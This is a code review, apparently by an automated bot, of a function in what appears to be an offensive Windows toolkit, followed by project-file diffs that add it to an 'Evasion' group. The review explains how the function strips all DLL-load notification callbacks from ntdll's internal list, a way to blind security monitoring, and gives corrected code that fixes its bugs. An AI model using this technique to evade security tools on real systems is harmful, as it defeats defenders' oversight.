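Review bot: `BaseAddressEnd = (PVOID)((PULONG)BaseAddress + Section->Misc.VirtualSize);` in `UnusedSubroutineGetDllNotification` does pointer arithmetic on a PULONG, so the end of ntdll's `.data` range is placed four times the section size past its start, and the `<=` on the following line makes the bound inclusive; nodes well outside `.data` are therefore accepted as the list head. Use byte arithmetic and a half-open range: `BaseAddressEnd = (PVOID)((PBYTE)BaseAddress + Section->Misc.VirtualSize);` and `if (LdrDllNotificationListNext >= BaseAddress && LdrDllNotificationListNext < BaseAddressEnd)`. `RtlLoadPeHeaders` is called without checking its result, after which `Nt` and `File` are dereferenced unconditionally, and `StringCompareA` is handed `Section->Name`, an 8-byte field that is not guaranteed to be NUL-terminated. `RemoveRegisterDllNotification` unlinks every node reachable from the head, not only the one this module registered, and does so with no synchronization, so a LoadLibrary on another thread that is presumably traversing the same list under the loader's own lock can observe a torn list — if wiping all callbacks is the intent, say so in a comment. The whole approach also rests on the cookie returned by `LdrRegisterDllNotification` being the address of a `LIST_ENTRY`, an implementation detail worth recording in a comment so it can be re-verified on new Windows builds.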


@ -245,6 +245,7 @@
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
<ClCompile Include="RemoveDescriptorEntry.cpp" />
<ClCompile Include="RemoveRegisterDllNotification.cpp" />
<ClCompile Include="SetHardwareBreakpoint.cpp" />
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />


@ -522,6 +522,9 @@
<ClCompile Include="LdrLoadGetProcedureAddress.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="RemoveRegisterDllNotification.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">


@ -335,6 +335,7 @@ BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
BOOL RemoveRegisterDllNotification(VOID);